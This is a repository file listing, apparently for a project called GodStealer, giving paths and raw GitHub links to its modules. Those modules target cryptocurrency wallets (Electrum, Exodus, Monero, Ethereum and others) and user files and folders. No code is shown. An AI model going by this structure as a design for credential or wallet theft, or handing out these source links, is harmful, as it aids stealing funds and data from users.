-------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/DashCore.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/DashCore.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/Electrum.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/Electrum.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/Ethereum.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/Ethereum.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/Exodus.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/Exodus.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/Jaxx.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/Jaxx.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/LitecoinCore.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/LitecoinCore.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/Monero.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/Monero.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/Zcash.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/Zcash.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Файлы/Files.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Файлы/Files.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Файлы/Folders.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Файлы/Folders.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Файлы/IFolders.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Файлы/IFolders.cs -------------------------------------------------------------------------------- /GodStealer/app.config: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/app.config -------------------------------------------------------------------------------- /GodStealer/app.manifest: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/app.manifest -------------------------------------------------------------------------------- /GodStealer/packages.config: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/packages.config -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/README.md -------------------------------------------------------------------------------- /packages.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/packages.zip --------------------------------------------------------------------------------